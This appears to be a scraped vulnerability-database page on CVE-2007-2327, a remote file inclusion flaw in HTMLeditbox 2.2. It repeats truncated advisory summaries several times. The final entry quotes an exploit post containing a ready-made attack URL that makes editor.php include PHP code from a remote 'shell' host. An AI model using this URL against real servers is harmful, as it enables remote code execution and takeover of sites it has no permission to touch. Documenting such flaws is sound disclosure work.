EUVD-2007-2322

Malware in sbrugna...

HTMLEditBox 2.2 Config.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/23664/info htmlEditbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploit this vulnerability to execute malicious PHP code in the context ...

Remote file inclusion

PHP remote file inclusion vulnerability in editor.php in HTMLeditbox 2.2 allows remote attackers to execute arbitrary PHP code via a URL in the settingsappdir parameter...

CVE-2007-2327

PHP remote file inclusion vulnerability in editor.php in HTMLeditbox 2.2 allows remote attackers to execute arbitrary PHP code via a URL in the settingsappdir parameter...

CVE-2007-2327

PHP remote file inclusion vulnerability in editor.php in HTMLeditbox 2.2 allows remote attackers to execute arbitrary PHP code via a URL in the settingsappdir parameter...

CVE-2007-2327

CVE-2007-2327 affects HTMLeditbox 2.2. The vulnerability is a PHP remote file inclusion in _editor.php triggered by a URL in settings[app_dir], allowing remote code execution. Root cause is improper handling of the app_dir parameter enabling inclusion of attacker-controlled PHP. Exploitation deta...

HTMLEditBox 2.2 - config.php Remote File Inclusion

HTMLEditBox 2.2 - config.php Remote File Inclusion source: https://www.securityfocus.com/bid/23664/info htmlEditbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploit this vulnerability to execute malicious PHP cod...

HTMLeditbox & 2.2 >> RFI

+++++++ name & version :HTMLeditbox & 2.2 vendor: http://www.labs4.com by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,dNetGuru bug : editor.php @include$settingsappdir.'/inc/config.php'; exploit : http://victim/editor.php?settingsappdir=http://shell ++++++...